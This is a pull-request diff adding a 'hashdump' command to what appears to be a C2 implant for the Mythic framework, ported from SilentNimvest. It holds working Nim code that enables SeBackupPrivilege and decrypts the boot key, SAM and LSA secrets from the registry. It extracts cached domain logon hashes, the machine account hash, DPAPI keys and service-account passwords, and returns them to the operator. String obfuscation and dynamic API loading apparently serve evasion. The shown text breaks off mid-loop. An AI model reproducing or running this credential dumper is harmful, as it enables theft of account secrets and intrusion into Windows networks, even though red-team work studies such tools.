### PR TITLE
feat: add hashdump command (SilentNimvest port)

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,10 @@
 nimcache/
 nimblecache/
 htmldocs/
+
+# Compound Engineering / ce-* local agent artifacts
+docs/brainstorms/
+docs/plans/
+docs/ideation/
+docs/solutions/
+.context/

--- a/Payload_Type/poopsie/poopsie/agent_code/poopsie.nimble
+++ b/Payload_Type/poopsie/poopsie/agent_code/poopsie.nimble
@@ -11,6 +11,8 @@ bin           = @["poopsie"]
 
 requires "nim >= 2.2.0"
 requires "nimcrypto >= 0.6.0"
+requires "checksums >= 0.2.0"
+requires "des >= 0.1.0"
 requires "winim >= 3.9.2"
 requires "pixie >= 5.0.6"
 requires "ws >= 0.5.0"

--- a/Payload_Type/poopsie/poopsie/agent_code/src/tasks/hashdump.nim
+++ b/Payload_Type/poopsie/poopsie/agent_code/src/tasks/hashdump.nim
@@ -1,0 +1,67 @@
+import ../utils/m_responses
+import ../utils/debug
+import ../utils/strenc
+import std/[json, strformat]
+
+when defined(windows):
+  import winim/lean
+  import ../utils/hashdump_harvest
+
+  const
+    TOKEN_ADJUST_PRIVILEGES = 0x0020
+    TOKEN_QUERY = 0x0008
+    SE_PRIVILEGE_ENABLED = 0x00000002
+
+  type
+    LuidHashdump = object
+      LowPart: DWORD
+      HighPart: LONG
+
+    LuidAndAttributesHashdump = object
+      Luid: LuidHashdump
+      Attributes: DWORD
+
+    TokenPrivilegesHashdump = object
+      PrivilegeCount: DWORD
+      Privileges: array[1, LuidAndAttributesHashdump]
+
+  proc LookupPrivilegeValueA(lpSystemName: LPCSTR, lpName: LPCSTR, lpLuid: ptr LuidHashdump): WINBOOL
+    {.importc, dynlib: obf("advapi32.dll"), stdcall.}
+
+  proc AdjustTokenPrivileges(TokenHandle: HANDLE, DisableAllPrivileges: WINBOOL,
+                             NewState: ptr TokenPrivilegesHashdump, BufferLength: DWORD,
+                             PreviousState: pointer, ReturnLength: ptr DWORD): WINBOOL
+    {.importc, dynlib: obf("advapi32.dll"), stdcall.}
+
+  proc enableSeBackupPrivilege(): bool =
+    var hToken: HANDLE = 0
+    if OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, addr hToken) == 0:
+      return false
+    var luid: LuidHashdump
+    let privName = obf("SeBackupPrivilege")
+    if LookupPrivilegeValueA(nil, privName.cstring, addr luid) == 0:
+      CloseHandle(hToken)
+      return false
+    var tp = TokenPrivilegesHashdump(
+      PrivilegeCount: 1,
+      Privileges: [LuidAndAttributesHashdump(Luid: luid, Attributes: SE_PRIVILEGE_ENABLED)]
+    )
+    let ok = AdjustTokenPrivileges(hToken, 0, addr tp, DWORD(sizeof(TokenPrivilegesHashdump)), nil, nil) != 0
+    let assigned = GetLastError() != 1300'u32  # ERROR_NOT_ALL_ASSIGNED
+    CloseHandle(hToken)
+    ok and assigned
+
+proc hashdump*(taskId: string, params: JsonNode): JsonNode =
+  when defined(windows):
+    try:
+      debug "[DEBUG] hashdump: starting"
+      if not enableSeBackupPrivilege():
+        return mythicError(taskId, obf("hashdump requires elevated Administrator with SeBackupPrivilege"))
+      let payload = collectHashdumpData()
+      return mythicSuccess(taskId, $payload)
+    except ValueError as e:
+      return mythicError(taskId, obf("hashdump failed: ") & e.msg)
+    except CatchableError as e:
+      return mythicError(taskId, obf("hashdump error: ") & e.msg)
+  else:
+    return mythicError(taskId, obf("hashdump command is only available on Windows"))

--- a/Payload_Type/poopsie/poopsie/agent_code/src/utils/hashdump_crypto.nim
+++ b/Payload_Type/poopsie/poopsie/agent_code/src/utils/hashdump_crypto.nim
@@ -1,0 +1,190 @@
+# Ported from SilentNimvest (MIT) - https://github.com/frkngksl/SilentNimvest
+
+import std/strutils
+import des/des
+import checksums/sha2
+import nimcrypto
+
+proc ComputeSha256*(key: seq[byte], value:seq[byte]):seq[byte] = 
+  var shaBase = newSeq[byte](0)
+  shaBase.add(key)
+  for i in countup(0,999):
+    shaBase.add(value[0..<32])
+  var hasher = initSha_256()
+  var charSeq = newSeq[char](shaBase.len)
+  copyMem(addr charSeq[0],addr shaBase[0],shaBase.len)
+  hasher.update(charSeq)
+  let digest = hasher.digest()
+  var returnValue = newSeq[byte](digest.len)
+  copyMem(addr returnValue[0],addr digest[0],digest.len)
+  return returnValue
+
+proc RC4Encrypt*(key: seq[byte], data: seq[byte]): seq[byte] =
+  var S = newSeq[int](256)
+  var K = newSeq[int](256)
+  var j:int = 0
+  var tempVal:int = 0 
+  var returnValue:seq[byte] = @[]
+
+  # Initialize S and K arrays
+  for i in 0 .. 255:
+    S[i] = i
+    K[i] = int(key[i mod key.len])
+  # Key scheduling algorithm
+  for i in 0 .. 255:
+    j = (j + S[i] + K[i]) mod 256
+    tempVal = S[i]
+    S[i] = S[j]
+    S[j] = tempVal
+  # Pseudo-random generation algorithm
+  var i = 0
+  j = 0
+  
+  for c in data:
+    i = (i + 1) mod 256
+    j = (j + S[i]) mod 256
+    tempVal = S[i]
+    S[i] = S[j]
+    S[j] = tempVal
+    returnValue.add(cast[byte](cast[int](c) xor S[(S[i] + S[j]) mod 256]))
+  return returnValue
+# Example usage
+
+proc TransformKey(inputData: seq[byte]): seq[byte] =
+  result.add(byte(((inputData[0] shr 1) and 0x7f) shl 1))
+  result.add(byte(((inputData[0] and 0x01) shl 6 or ((inputData[1] shr 2) and 0x3f)) shl 1))
+  result.add(byte(((inputData[1] and 0x03) shl 5 or ((inputData[2] shr 3) and 0x1f)) shl 1))
+  result.add(byte(((inputData[2] and 0x07) shl 4 or ((inputData[3] shr 4) and 0x0f)) shl 1))
+  result.add(byte(((inputData[3] and 0x0f) shl 3 or ((inputData[4] shr 5) and 0x07)) shl 1))
+  result.add(byte(((inputData[4] and 0x1f) shl 2 or ((inputData[5] shr 6) and 0x03)) shl 1))
+  result.add(byte(((inputData[5] and 0x3f) shl 1 or ((inputData[6] shr 7) and 0x01)) shl 1))
+  result.add(byte((inputData[6] and 0x7f) shl 1))
+
+proc RidToKey(hexRid: string): tuple[key1: seq[byte], key2: seq[byte]] =
+  let rid = parseHexInt(hexRid).uint32
+
+  var temp1: seq[byte]
+  temp1.add(byte(rid and 0xFF))
+  temp1.add(byte((rid shr 8) and 0xFF))
+  temp1.add(byte((rid shr 16) and 0xFF))
+  temp1.add(byte((rid shr 24) and 0xFF))
+  temp1.add(temp1[0])
+  temp1.add(temp1[1])
+  temp1.add(temp1[2])
+
+  var temp2: seq[byte]
+  temp2.add(temp1[3])
+  temp2.add(temp1[0])
+  temp2.add(temp1[1])
+  temp2.add(temp1[2])
+  temp2.add(temp2[0])
+  temp2.add(temp2[1])
+  temp2.add(temp2[2])
+
+  result.key1 = TransformKey(temp1)
+  result.key2 = TransformKey(temp2)
+
+proc DeObfuscateHashPart*(obfuscatedHash: seq[byte], key: seq[byte]): seq[byte] =
+  var desCrypter = newDesCipher(key)
+  desCrypter.setIV(@[byte 0, 0, 0, 0, 0, 0, 0, 0])
+  var output = newSeq[byte](8)
+  desCrypter.decrypt(obfuscatedHash, output, modeECB)
+  return output
+
+
+
+
+proc DecryptSingleHash*(obfuscatedHash: seq[byte], user: string): string =
+  let (key1, key2) = RidToKey(user)
+
+  let hashBytes1 = obfuscatedHash[0 ..< 8]
+  let hashBytes2 = obfuscatedHash[8 ..< 16]
+
+  let plain1 = DeObfuscateHashPart(hashBytes1, key1)
+  let plain2 = DeObfuscateHashPart(hashBytes2, key2)
+
+  for b in plain1: result.add(b.toHex(2))
+  for b in plain2: result.add(b.toHex(2))
+
+
+proc Pad*(data:int):int =
+  if ((data and 0x3) > 0):
+    return (data + (data and 0x3));
+  else:
+    return data
+
+proc DecryptAES_CBC*(encryptedData:seq[byte],key:seq[byte],iv:seq[byte]):seq[byte] =
+  var  
+    dctx_cbc : CBC[aes128]
+    decryptedCBC:seq[byte]
+    tailLength:int = encryptedData.len mod 16
+    mutableEncryptedData:seq[byte]
+  mutableEncryptedData = newSeq[byte](encryptedData.len)
+  copyMem(addr mutableEncryptedData[0],addr encryptedData[0],encryptedData.len)  
+  if (tailLength != 0):
+     for i in countup(0,16 - tailLength-1):
+         mutableEncryptedData.add(@[byte 0x00]);
+  decryptedCBC = newSeq[byte](mutableEncryptedData.len)
+  dctx_cbc.init(addr key[0], addr iv[0])
+  dctx_cbc.decrypt(addr mutableEncryptedData[0],addr decryptedCBC[0],cast[uint](mutableEncryptedData.len))
+  # Clear context of CBC[aes256]
+  dctx_cbc.clear()
+  return decryptedCBC
+
+
+proc Md4Hash2*(input: seq[byte]): seq[byte] =
+  var bytes = input
+  let bitCount = uint32(bytes.len) * 8
+  bytes.add(0x80'u8)
+  while bytes.len mod 64 != 56:
+    bytes.add(0'u8)
+
+  var uints: seq[uint32]
+  var i = 0
+  while i + 3 < bytes.len:
+    uints.add(uint32(bytes[i]) or
+              uint32(bytes[i+1]) shl 8 or
+              uint32(bytes[i+2]) shl 16 or
+              uint32(bytes[i+3]) shl 24)
+    i += 4
+  uints.add(bitCount)
+  uints.add(0'u32)
+
+  var a = 0x67452301'u32
+  var b = 0xefcdab89'u32
+  var c = 0x98badcfe'u32
+  var d = 0x10325476'u32
+
+  template rol(x, y: uint32): uint32 =
+    (x shl int(y)) or (x shr (32 - int(y)))
+
+  var q = 0
+  while q + 15 < uints.len:
+    let chunk = uints[q ..< q + 16]
+    let aa = a; let bb = b; let cc = c; let dd = d
+
+    template doRound(f: untyped, ivals: array[4, uint32],
+                     ki: array[4, uint32], s: array[4, uint32], constant: uint32) =
+      for idx in 0 ..< 4:
+        let iv = ivals[idx]
+        a = rol(a + f(b, c, d) + chunk[int(iv + ki[0])] + constant, s[0])
+        d = rol(d + f(a, b, c) + chunk[int(iv + ki[1])] + constant, s[1])
+        c = rol(c + f(d, a, b) + chunk[int(iv + ki[2])] + constant, s[2])
+        b = rol(b + f(c, d, a) + chunk[int(iv + ki[3])] + constant, s[3])
+
+    template f1(x, y, z: uint32): uint32 = (x and y) or (not x and z)
+    template f2(x, y, z: uint32): uint32 = (x and y) or (x and z) or (y and z)
+    template f3(x, y, z: uint32): uint32 = x xor y xor z
+
+    doRound(f1, [0'u32, 4, 8, 12], [0'u32, 1, 2, 3],  [3'u32, 7, 11, 19], 0'u32)
+    doRound(f2, [0'u32, 1, 2,  3], [0'u32, 4, 8, 12], [3'u32, 5,  9, 13], 0x5a827999'u32)
+    doRound(f3, [0'u32, 2, 1,  3], [0'u32, 8, 4, 12], [3'u32, 9, 11, 15], 0x6ed9eba1'u32)
+
+    a += aa; b += bb; c += cc; d += dd
+    q += 16
+
+  for val in [a, b, c, d]:
+    result.add(byte(val and 0xff))
+    result.add(byte((val shr 8) and 0xff))
+    result.add(byte((val shr 16) and 0xff))
+    result.add(byte((val shr 24) and 0xff))

--- a/Payload_Type/poopsie/poopsie/agent_code/src/utils/hashdump_harvest.nim
+++ b/Payload_Type/poopsie/poopsie/agent_code/src/utils/hashdump_harvest.nim
@@ -1,0 +1,578 @@
+# Ported from SilentNimvest (MIT) - https://github.com/frkngksl/SilentNimvest
+
+## Silent Harvest registry credential collection (ported from SilentNimvest Main.nim).
+
+import hashdump_structs
+import hashdump_crypto
+import winim/lean
+import std/[strutils, sequtils, json]
+import checksums/md5
+import nimcrypto
+
+type
+    NtOpenKeyExType = proc(KeyHandle: PHANDLE, DesiredAccess: ACCESS_MASK, ObjectAttributes: POBJECT_ATTRIBUTES, OpenOptions: ULONG):NTSTATUS {.stdcall.}
+    NtQueryKeyType = proc(KeyHandle: HANDLE,KeyInformationClass: KEY_INFORMATION_CLASS, KeyInformation: PVOID, Length: ULONG, ResultLength: PULONG):NTSTATUS {.stdcall.}
+    RegQueryMultipleValuesWType = proc(hKey: HKEY, val_list: PVALENTW, num_vals: DWORD, lpValueBuf: LPWSTR, ldwTotsize: LPDWORD):LSTATUS {.stdcall.}
+    NtEnumerateKeyType = proc (KeyHandle: HANDLE,Index: ULONG, KeyInformationClass: KEY_INFORMATION_CLASS, KeyInformation: PVOID,Length: ULONG,ResultLength: PULONG): NTSTATUS {.stdcall.}
+    NtEnumerateValueKeyType = proc (KeyHandle: HANDLE,Index: ULONG,KeyValueInformationClass: KEY_VALUE_INFORMATION_CLASS,KeyValueInformation:PVOID,Length:ULONG,ResultLength:PULONG): NTSTATUS {.stdcall.}
+    NtCloseType = proc (KeyHandle: HANDLE): NTSTATUS {.stdcall.}
+var 
+    NtOpenKeyExProc:NtOpenKeyExType= nil
+    RegQueryMultipleValuesWProc:RegQueryMultipleValuesWType = nil
+    NtQueryKeyProc:NtQueryKeyType = nil
+    NtEnumerateKeyProc:NtEnumerateKeyType = nil
+    NtEnumerateValueKeyProc:NtEnumerateValueKeyType = nil
+    NtCloseProc:NtCloseType = nil
+
+
+proc OpenRegistryWithNtOpenKeyEx(keyString: PCWSTR): HANDLE =
+  var 
+    keyUnicode:UNICODE_STRING
+    objectAttributes:OBJECT_ATTRIBUTES 
+    openOptions:ULONG
+    ntStatus:NTSTATUS
+    returnHandle:HANDLE
+  RtlInitUnicodeString(addr(keyUnicode),keyString);
+  InitializeObjectAttributes(addr(objectAttributes),addr(keyUnicode),OBJ_CASE_INSENSITIVE,0,nil)
+  openOptions = REG_OPTION_BACKUP_RESTORE or REG_OPTION_OPEN_LINK
+  ntStatus = NtOpenKeyExProc(addr returnHandle,KEY_READ,addr objectAttributes, openOptions)
+  if(ntStatus != 0):
+    echo "[-] Error on openning key for ",keyString," : ",GetLastError()
+    raise newException(ValueError, "hashdump harvest failed")
+  return returnHandle
+
+proc EnumerateValueNames(hKey:HANDLE):seq[string] = 
+  var
+    returnValue:seq[string] = @[]
+    index: ULONG = 0
+    resultLength: ULONG = 0
+    buffer:seq[byte]
+    status:NTSTATUS
+    info:ptr KEY_VALUE_BASIC_INFORMATION_STRUCT
+    namePtr:ptr WCHAR
+    name:string
+  while true:
+
+    discard NtEnumerateValueKeyProc(hKey,index,KeyValueBasicInformation,nil,0,addr resultLength)
+
+    if resultLength == 0:
+      break
+
+    buffer = newSeq[byte](resultLength)
+
+    status = NtEnumerateValueKeyProc(hKey,index,KeyValueBasicInformation,addr buffer[0],resultLength,addr resultLength)
+
+    if status != 0:
+      break
+
+    info = cast[ptr KEY_VALUE_BASIC_INFORMATION_STRUCT](addr buffer[0])
+
+    namePtr = cast[ptr WCHAR](addr info.Name)
+
+    name = $cast[WideCString](namePtr)
+
+    if(cmpIgnoreCase(name,"NL$Control") != 0):
+      returnValue.add(name)
+    inc index
+  return returnValue
+
+proc GetValueWithRegQueryMultipleValuesWType(keyHandle: HANDLE,valueString: string):seq[byte] = 
+  var 
+    values: array[1, VALENTW]
+    buffer: seq[byte]
+    slice: seq[byte]
+    bufferSize: DWORD
+    returnValue:LSTATUS
+  
+  values[0].ve_valuename = valueString.newWideCString()
+  bufferSize = 0
+  returnValue = RegQueryMultipleValuesW( keyHandle, addr values[0], 1, nil, addr bufferSize)
+  
+  if returnValue != ERROR_MORE_DATA or bufferSize == 0:
+    echo "[-] Error on reading buffer size for ",valueString," : ",GetLastError()
+    raise newException(ValueError, "hashdump harvest failed")
+    
+  buffer = newSeq[byte](bufferSize)
+
+  returnValue = RegQueryMultipleValuesW(keyHandle, addr values[0], 1, cast[LPWSTR](addr buffer[0]), addr bufferSize)
+  
+  if returnValue != 0:
+      echo "[-] Error on getting value for ",valueString," : ",GetLastError()
+      raise newException(ValueError, "hashdump harvest failed")
+  
+  if values[0].ve_valuelen > 0:
+    let offset = values[0].ve_valueptr.int - cast[int](addr buffer[0])
+    if offset >= 0 and offset + values[0].ve_valuelen.int <= buffer.len:
+      slice = buffer[offset ..< offset + values[0].ve_valuelen.int]
+      return slice
+  return @[]
+
+proc DynamicallyLoadFunctions():bool =
+  var 
+    ntdllHandle:HMODULE
+    advapi32Handle:HMODULE 
+  ntdllHandle = LoadLibraryA("ntdll.dll")
+  advapi32Handle = LoadLibraryA("advapi32.dll")
+  let ntOpenKeyExAddr = GetProcAddress(ntdllHandle, "NtOpenKeyEx")
+  if(ntOpenKeyExAddr == cast[FARPROC](0)):
+    echo "[-] Error on Dynamically Loading functions for NtOpenKeyEx"
+    return false
+  let regQueryMultipleValuesWAddr = GetProcAddress(advapi32Handle, "RegQueryMultipleValuesW")
+  if(regQueryMultipleValuesWAddr == cast[FARPROC](0)):
+    echo "[-] Error on Dynamically Loading functions for RegQueryMultipleValuesW"
+    return false
+  let ntQueryKeyAddr = GetProcAddress(ntdllHandle, "NtQueryKey")
+  if(ntQueryKeyAddr == cast[FARPROC](0)):
+    echo "[-] Error on Dynamically Loading functions for NtQueryKey"
+    return false
+  let ntEnumerateKeyAddr = GetProcAddress(ntdllHandle, "NtEnumerateKey")
+  if(ntEnumerateKeyAddr == cast[FARPROC](0)):
+    echo "[-] Error on Dynamically Loading functions for NtEnumerateKey"
+    return false
+  let ntEnumerateValueKeyAddr = GetProcAddress(ntdllHandle, "NtEnumerateValueKey")
+  if(ntEnumerateValueKeyAddr == cast[FARPROC](0)):
+    echo "[-] Error on Dynamically Loading functions for NtEnumerateValueKey"
+    return false
+  let ntCloseAddr = GetProcAddress(ntdllHandle, "NtClose")
+  if(ntCloseAddr == cast[FARPROC](0)):
+    echo "[-] Error on Dynamically Loading functions for NtClose"
+    return false
+  NtOpenKeyExProc = cast[NtOpenKeyExType](ntOpenKeyExAddr)
+  RegQueryMultipleValuesWProc = cast[RegQueryMultipleValuesWType](regQueryMultipleValuesWAddr)
+  NtQueryKeyProc = cast[NtQueryKeyType](ntQueryKeyAddr)
+  NtEnumerateKeyProc = cast[NtEnumerateKeyType](ntEnumerateKeyAddr)
+  NtEnumerateValueKeyProc = cast[NtEnumerateValueKeyType](ntEnumerateValueKeyAddr)
+  NtCloseProc = cast[NtCloseType](ntCloseAddr)
+  return true
+
+proc GetBootKey(): seq[byte] = 
+  var 
+    keyValue:string
+    regHandle:HANDLE
+    bufferSize:ULONG
+    returnValue:NTSTATUS
+    buffer:seq[byte]
+    returnBuffer:seq[byte] = newSeq[byte](16)
+    scrambledByteArray:seq[byte]
+    keyClassInfoPtr:PKEY_NODE_INFORMATION
+    pClass: ptr UncheckedArray[WCHAR]
+    classCharLen: ULONG
+    classStr:string = ""
+  let permutationMatrix = [byte 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7]
+  let keyLocations = ["JD", "Skew1", "GBG", "Data"]
+  let mainRegLocation = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\"
+  for keyLocation in keyLocations:
+    keyValue = mainRegLocation & keyLocation
+    regHandle = OpenRegistryWithNtOpenKeyEx(keyValue)
+    bufferSize = 0
+    returnValue = NtQueryKeyProc(regHandle, KeyNodeInformation, NULL, 0, addr bufferSize)
+    if bufferSize == 0:
+      echo "[-] Error on reading buffer size for ",keyValue," : ",GetLastError()
+      raise newException(ValueError, "hashdump harvest failed")
+    buffer = newSeq[byte](bufferSize)
+    returnValue = NtQueryKeyProc(regHandle, KeyNodeInformation, cast[PVOID](addr buffer[0]), bufferSize, addr bufferSize)
+    discard NtCloseProc(regHandle)
+    if returnValue != 0:
+      echo "[-] Error on getting value for ",keyValue," : ",GetLastError()
+      raise newException(ValueError, "hashdump harvest failed")
+    keyClassInfoPtr = cast[PKEY_NODE_INFORMATION](addr buffer[0])
+    if keyClassInfoPtr.ClassLength > 0:
+      pClass = cast[ptr UncheckedArray[WCHAR]]( cast[uint64](addr buffer[0]) + cast[uint64](keyClassInfoPtr.ClassOffset))
+      classCharLen = keyClassInfoPtr.ClassLength div cast[ULONG](sizeof(WCHAR))
+      for i in 0 ..< classCharLen.int:
+        classStr.add(cast[char](pClass[i]))
+  scrambledByteArray = hexStringToByteArray(classStr)
+  for i in countup(0,15):
+    returnBuffer[i] = scrambledByteArray[permutationMatrix[i]]
+  return returnBuffer
+
+proc GetSysKey(): seq[byte] = 
+  var handleVal = OpenRegistryWithNtOpenKeyEx("\\Registry\\Machine\\SAM\\SAM\\Domains\\Account")
+  var returnByte = GetValueWithRegQueryMultipleValuesWType(handleVal,"F")
+  discard NtCloseProc(handleVal)
+  return returnByte
+
+
+
+proc GetHashedBootKey(fVal:seq[byte],bootKey:seq[byte]):seq[byte] = 
+  let domainData = fVal[104 ..< fVal.len]
+
+  # old style hashed bootkey storage
+  if domainData[0] == 0x01:
+    let f70:seq[byte]  = fVal[112 ..< 112+16]
+    var data:seq[byte] = @[]
+
+    data.add(f70)
+    data.add(cast[seq[byte]]("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"))
+    data.add(bootKey)
+    data.add(cast[seq[byte]]("0123456789012345678901234567890123456789\0"))
+    var md5ContextVar:MD5Context
+    var md5DigestVar:MD5Digest
+    md5ContextVar.md5Init()
+    md5ContextVar.md5Update(data)
+    md5ContextVar.md5Final(md5DigestVar)
+    let md5bytes = newSeq[byte](16)
+    copyMem(addr md5bytes[0],addr md5DigestVar[0],16)
+    let f80 = fVal[128 ..< 128+32]
+
+    return RC4Encrypt(md5bytes, f80)
+
+  # new version -- Win 2016 / Win 10 and above
+  elif domainData[0] == 0x02:
+    var dctx : CBC[aes128]
+    var sk_Salt_AES   = domainData[16 ..< 16+16]
+    var sk_Data_Length = (cast[ptr int32](addr domainData[12]))[]
+    var sk_Data_AES   = domainData[32 ..< 32 + sk_Data_Length]
+
+    var decText = newSeq[byte](sk_Data_Length)
+    # Initialization of CBC[aes256] context with encryption key
+    dctx.init(addr bootKey[0], addr sk_Salt_AES[0])
+    # Decryption process
+    dctx.decrypt(addr sk_Data_AES[0], addr decText[0],cast[uint](sk_Data_Length))
+    # Clear context of CBC[aes256]
+    dctx.clear()
+    return decText
+  else:
+    echo "[-] Error parsing hashed bootkey"
+    raise newException(ValueError, "hashdump harvest failed")
+
+proc DumpSecret(keyLocation:string,decryptedLsaKey:seq[byte]):seq[byte] = 
+  var 
+    hKey:HANDLE = OpenRegistryWithNtOpenKeyEx(keyLocation)
+    value:seq[byte] = GetValueWithRegQueryMultipleValuesWType(hKey,"")
+    tempKey:seq[byte]
+    valueData:seq[byte]
+    valueDataVal2:seq[byte]
+    returnValue:seq[byte]
+    dctx: ECB[aes256]
+
+
+  valueData = value[28..<value.len]
+  tempKey = ComputeSha256(decryptedLsaKey,valueData[0..<32])
+  valueDataVal2 = valueData[32..<32+valueData.len-32]
+  # Initialization of ECB[aes256] context with encryption key
+  dctx.init(tempKey)
+  returnValue = newSeq[byte](valueDataVal2.len)
+  # Decryption process
+  dctx.decrypt(valueDataVal2, returnValue)
+  # Clear context of ECB[aes256]
+  dctx.clear()
+  discard NtCloseProc(hKey)
+  return returnValue
+
+proc GetServiceUsername(targetService: string): string =
+  let scMgrHandle = OpenSCManager(NULL, NULL, 0xF003F);
+  let svcHandle = OpenService(scMgrHandle, targetService, SERVICE_QUERY_CONFIG)
+  
+  if svcHandle != 0:
+    var bytesNeeded: DWORD = 0
+    # First call fails intentionally to get required buffer size
+    discard QueryServiceConfig(svcHandle, nil, 0, addr bytesNeeded)
+    
+    let qscPtr = newSeq[byte](bytesNeeded)
+
+    if QueryServiceConfig(svcHandle, cast[LPQUERY_SERVICE_CONFIG](addr qscPtr[0]),bytesNeeded, addr bytesNeeded):
+      let serviceInfo = cast[LPQUERY_SERVICE_CONFIG](addr qscPtr[0])
+      CloseServiceHandle(svcHandle)
+      return $serviceInfo.lpServiceStartName
+  CloseServiceHandle(svcHandle)
+  return "unknownUser"
+
+proc recordLsaSecret(result: var HashdumpResult, keyName: string, secretBlob: LsaSecretBlob) =
+  if(keyName.toUpper().startsWith("_SC_")):
+    let userName = GetServiceUsername(keyName[4..<keyName.len])
+    result.lsa_secrets.add(%*{"type": "service_credential", "name": keyName, "username": userName, "secret": $secretBlob.SecretString})
+  elif(keyName.toUpper().startsWith("$MACHINE.ACC")):
+    let hKey:HANDLE = OpenRegistryWithNtOpenKeyEx("\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters")
+    let domainNameArr = GetValueWithRegQueryMultipleValuesWType(hKey,"Domain")
+    var domainName = SeqToUnicode(domainNameArr).replace("\0", "")
+    let computerNameArr = GetValueWithRegQueryMultipleValuesWType(hKey,"Hostname")
+    var computerName = SeqToUnicode(computerNameArr).replace("\0", "")
+    let computerAcctHash = Md4Hash2(secretBlob.Secret).mapIt(it.toHex(2)).join("-").replace("-","").toLower()
+    discard NtCloseProc(hKey)
+    result.machine_account = domainName & "\\" & computerName & "$:aad3b435b51404eeaad3b435b51404ee:" & computerAcctHash
+  elif(keyName.toUpper().startsWith("DPAPI")):
+    let machineStr = secretBlob.Secret[4..<4+20].mapIt(it.toHex(2)).join("-")
+    let userStr = secretBlob.Secret[24..<24+20].mapIt(it.toHex(2)).join("-")
+    result.dpapi_machine_key = machineStr.replace("-","").toLower(); result.dpapi_user_key = userStr.replace("-","").toLower()
+  elif(keyName.toUpper().startsWith("NL$KM")):
+    result.nlkm = secretBlob.Secret.mapIt(it.toHex(2)).join("-").replace("-","").toLower()
+  elif(keyName.toUpper().startsWith("ASPNET_WP_PASSWORD")):
+    result.lsa_secrets.add(%*{"type": "aspnet", "name": keyName, "secret": $secretBlob.SecretString})
+  else:
+    result.lsa_secrets.add(%*{"type": "unsupported", "name": keyName, "secret_hex": secretBlob.Secret.mapIt(it.toHex(2)).join("-").replace("-","").toLower()})
+
+proc collectSecurityDump(result: var HashdumpResult) = 
+  var
+    hKey = OpenRegistryWithNtOpenKeyEx("\\Registry\\Machine\\SECURITY\\Policy\\PolEKList")
+    fVal = GetValueWithRegQueryMultipleValuesWType(hKey,"")
+    data = fVal[28..<fVal.len]
+    dataVal = data[0..<32]
+    bootKey = GetBootKey()
+    tempKey = ComputeSha256(bootKey, dataVal)
+    dataVal2 = data[32..<32+data.len - 32]
+    decryptedLsaKey:seq[byte] = newSeq[byte](dataVal2.len) #Crypto.DecryptAES_ECB(dataVal2, tempKey).Skip(68).Take(32).ToArray();
+    dctx: ECB[aes256]
+    nlkmKey:seq[byte]
+    currValName:string = ""
+    index: ULONG = 0
+    buf:seq[byte]
+    status: NTSTATUS
+    bufSize: ULONG
+    pInfo:PKEY_BASIC_INFORMATION
+    nameLen:ULONG
+    name:string = ""
+    pName: ptr UncheckedArray[WCHAR]
+    cachedDomainLogonKeyNames:seq[string]
+    cachedDomainLogonValue:seq[byte]
+    cachedUser:NlRecord
+    decryptedCBC:seq[byte]
+    slice:seq[byte]
+    hashedPW:seq[byte]
+    username:string
+    domain:string
+    startIndex:int
+    sliceUsername:seq[byte]
+    sliceDomain:seq[byte]
+    listOfLSASecrets:seq[string]
+    secretBlob:LsaSecretBlob
+
+  # Initialization of ECB[aes256] context with encryption key
+  dctx.init(tempKey)
+  # Decryption process
+  dctx.decrypt(dataVal2, decryptedLsaKey)
+  # Clear context of ECB[aes256]
+  dctx.clear()
+  decryptedLsaKey = decryptedLsaKey[68..<68+32]
+  discard NtCloseProc(hKey)
+  hKey = OpenRegistryWithNtOpenKeyEx("\\Registry\\Machine\\SECURITY\\Policy\\Secrets\\NL$KM")
+  while true:
+    bufSize = 0
+    status = NtEnumerateKeyProc(hKey,index,KeyBasicInformation,nil,0,addr bufSize)
+
+    if status == STATUS_NO_MORE_ENTRIES:
+      break
+
+    buf = newSeq[byte](bufSize)
+
+    status = NtEnumerateKeyProc(hKey,index,KeyBasicInformation,cast[PVOID](addr buf[0]),bufSize,addr bufSize)
+
+    if status == 0:
+      pInfo = cast[PKEY_BASIC_INFORMATION](addr buf[0])
+      nameLen = pInfo.NameLength div sizeof(WCHAR).ULONG
+      pName = cast[ptr UncheckedArray[WCHAR]](addr pInfo.Name)
+
+      name = ""
+      for i in 0 ..< nameLen.int:
+        name.add(cast[char](pName[i]))
+
+      if(name.contains("CurrVal")):
+        currValName = name
+        break
+    inc index
+  if(currValName == ""):
+    raise newException(ValueError, "NL$KM key not found"); discard newException(ValueError, "hashdump harvest failed")
+  discard NtCloseProc(hKey)
+  nlkmKey = DumpSecret("\\Registry\\Machine\\SECURITY\\Policy\\Secrets\\NL$KM\\"&currValName,decryptedLsaKey)
+  hKey = OpenRegistryWithNtOpenKeyEx("\\Registry\\Machine\\SECURITY\\Cache")
+  cachedDomainLogonKeyNames=EnumerateValueNames(hKey)
+  for domainKeyName in cachedDomainLogonKeyNames:
+    cachedDomainLogonValue = GetValueWithRegQueryMultipleValuesWType(hKey,domainKeyName)
+    if(not (cachedDomainLogonValue[0 ..< 16].allIt(it == 0))):
+      cachedUser = InitNlRecord(cachedDomainLogonValue)
+      slice = nlkmKey[16..<16+16]
+      decryptedCBC = DecryptAES_CBC(cachedUser.EncryptedData,slice,cachedUser.Iv)
+      hashedPW = decryptedCBC[0..<16]
+      sliceUsername = decryptedCBC[72..<72+cachedUser.UserLength]
+      startIndex = 72 + Pad(cachedUser.UserLength) + Pad(cachedUser.DomainNameLength)
+      sliceDomain = decryptedCBC[startIndex..<startIndex+Pad(cachedUser.DnsDomainLength)]
+      domain = SeqToUnicode(sliceDomain)
+      username = SeqToUnicode(sliceUsername)
+      domain = domain.replace("\0", "")
+      result.cached_logons.add(%*{"domain": domain, "username": username, "hash": "$DCC2$10240#" & username & "#" & hashedPW.mapIt(it.toHex(2)).join("-").replace("-","").toLower()})
+  discard NtCloseProc(hKey)
+  hKey = OpenRegistryWithNtOpenKeyEx("\\Registry\\Machine\\SECURITY\\Policy\\Secrets")
+  index = 0
+  while true:
+    bufSize = 0
+    status = NtEnumerateKeyProc(hKey,index,KeyBasicInformation,nil,0,addr bufSize)
+
+    if status == STATUS_NO_MORE_ENTRIES:
+      break
+
